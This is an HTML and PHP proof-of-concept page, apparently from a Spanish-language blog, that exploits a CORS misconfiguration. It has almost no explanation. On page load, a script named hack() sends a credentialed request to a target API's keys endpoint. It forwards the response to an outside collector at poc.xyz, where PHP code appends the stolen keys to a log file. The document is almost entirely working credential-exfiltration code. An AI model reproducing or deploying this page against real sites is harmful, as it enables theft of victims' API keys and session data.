<!DOCTYPE html>
<html>
<head>
<script>
function hack()
{
var xmlhttp;
if (window.XMLHttpRequest)
{
xmlhttp=new XMLHttpRequest();
}
else
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.open("POST","http://api-xdxdxdxd/api/v1/keys",false);
xmlhttp.withCredentials = true;
xmlhttp.send(null);
if(xmlhttp.status==200)
{
var str = document.getElementById("demo").innerHTML = xmlhttp.responseText;
params = "keys="+str;
xmlhttp.open("POST","http://poc.xyz/poc_cors.php",false);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("Accept-Language","es-MX,es;q=0.8,en-US;q=0.5,en;q=0.3");
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlhttp.send(params);
}
}
</script>
</head>
<body onload="hack();">
<div id="demo"></div>
</body>
<?php
if(isset($_POST['keys'])){
$cookie = $_POST['keys'];
$steal = fopen("log.txt", "a");
fwrite($steal, $cookie ."\n"); //<---- Must be $cookie instead of $name
fclose($steal);
}
?>
</html>
No hay comentarios:
Publicar un comentario